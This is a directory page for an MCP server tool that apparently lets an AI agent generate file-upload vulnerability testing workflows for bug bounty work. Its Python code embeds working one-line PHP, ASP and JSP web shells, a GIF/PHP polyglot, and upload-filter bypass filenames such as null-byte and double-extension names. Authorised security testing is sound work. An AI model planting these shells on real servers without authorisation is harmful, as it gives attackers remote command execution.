Skip to main content
Glama
SlanyCukr

Bug Bounty MCP Server

by SlanyCukr
OverviewInspectSchemaRelated ServersScoreDiscussions
Python
Remote

bugbounty_file_upload_testing

Test web applications for file upload vulnerabilities by generating targeted testing workflows with appropriate test files to identify security weaknesses.

Instructions

Create file upload vulnerability testing workflow.

Args: target_url: Target URL for file upload testing

Returns: File upload testing workflow with test files

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
target_urlYes

Implementation Reference

  • src/mcp_server/app.py:1425-1446 (handler)
    The handler function for the MCP tool 'bugbounty_file_upload_testing'. It proxies the request to the REST API endpoint '/api/bugbounty/file-upload-testing' to generate a file upload vulnerability testing workflow.
    def bugbounty_file_upload_testing(target_url: str) -> dict[str, Any]: """Create file upload vulnerability testing workflow. Args: target_url: Target URL for file upload testing Returns: File upload testing workflow with test files """ data = {"target_url": target_url} logger.info(f"📁 Creating file upload testing workflow for {target_url}") result = api_client.safe_post("api/bugbounty/file-upload-testing", data) if result.get("success"): logger.info(f"✅ File upload testing workflow created for {target_url}") else: logger.error( f"❌ Failed to create file upload testing workflow for {target_url}" ) return result
  • src/rest_api_server/workflows/file_upload_testing/file_upload_testing.py:13-146 (helper)
    The backend implementation and helper class FileUploadTestingFramework that generates the file upload testing workflow data structure, including test files, phases, and bypass techniques. This is called by the MCP tool via the REST API.
    class FileUploadTestingFramework: """Specialized framework for file upload vulnerability testing.""" def __init__(self): """Initialize file upload testing framework with malicious extensions.""" self.malicious_extensions = [ ".php", ".php3", ".php4", ".php5", ".phtml", ".pht", ".asp", ".aspx", ".jsp", ".jspx", ".py", ".rb", ".pl", ".cgi", ".sh", ".bat", ".cmd", ".exe", ] self.bypass_techniques = [ "double_extension", "null_byte", "content_type_spoofing", "magic_bytes", "case_variation", "special_characters", ] def generate_test_files(self) -> dict[str, Any]: """Generate various test files for upload testing.""" test_files = { "web_shells": [ { "name": "simple_php_shell.php", "content": "<?php system($_GET['cmd']); ?>", }, {"name": "asp_shell.asp", "content": '<%eval request("cmd")%>'}, { "name": "jsp_shell.jsp", "content": ( '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>' ), }, ], "bypass_files": [ {"name": "shell.php.txt", "technique": "double_extension"}, {"name": "shell.php%00.txt", "technique": "null_byte"}, {"name": "shell.PhP", "technique": "case_variation"}, {"name": "shell.php.", "technique": "trailing_dot"}, ], "polyglot_files": [ { "name": "polyglot.jpg", "content": "GIF89a<?php system($_GET['cmd']); ?>", "technique": "image_polyglot", } ], } return test_files def create_upload_testing_workflow(self, target_url: str) -> dict[str, Any]: """Create comprehensive file upload testing workflow.""" workflow = { "target": target_url, "test_phases": [ { "name": "reconnaissance", "description": "Identify upload endpoints", "tools": ["katana", "gau", "paramspider"], "expected_findings": ["upload_forms", "api_endpoints"], }, { "name": "baseline_testing", "description": "Test legitimate file uploads", "test_files": ["image.jpg", "document.pdf", "text.txt"], "observations": [ "response_codes", "file_locations", "naming_conventions", ], }, { "name": "malicious_upload_testing", "description": "Test malicious file uploads", "test_files": self.generate_test_files(), "bypass_techniques": self.bypass_techniques, }, { "name": "post_upload_verification", "description": "Verify uploaded files and test execution", "actions": [ "file_access_test", "execution_test", "path_traversal_test", ], }, ], "estimated_time": 360, "risk_level": "high", } return workflow FILEUPLOAD_FRAMEWORK = FileUploadTestingFramework() @workflow() def create_file_upload_testing_workflow(): """Create file upload vulnerability testing workflow.""" data = request.get_json() target_url = data["target_url"] logger.info(f"Creating file upload testing workflow for {target_url}") # Generate file upload testing workflow workflow = FILEUPLOAD_FRAMEWORK.create_upload_testing_workflow(target_url) # Generate test files test_files = FILEUPLOAD_FRAMEWORK.generate_test_files() workflow["test_files"] = test_files logger.info(f"File upload testing workflow created for {target_url}") return workflow
  • src/rest_api_server/workflows/__init__.py:1-20 (registration)
    Imports the file_upload_testing workflow module, which registers the API endpoint '/api/bugbounty/file-upload-testing' used by the MCP tool.
    """Workflows package - imports all workflow modules to register their endpoints.""" # Import all workflow modules to trigger endpoint registration from . import ( business_logic, comprehensive_assessment, file_upload_testing, osint, reconnaissance, vulnerability_hunting, ) __all__ = [ "business_logic", "comprehensive_assessment", "file_upload_testing", "osint", "reconnaissance", "vulnerability_hunting", ]

This server cannot be installed

Other Tools

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/SlanyCukr/bugbounty-mcp-server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server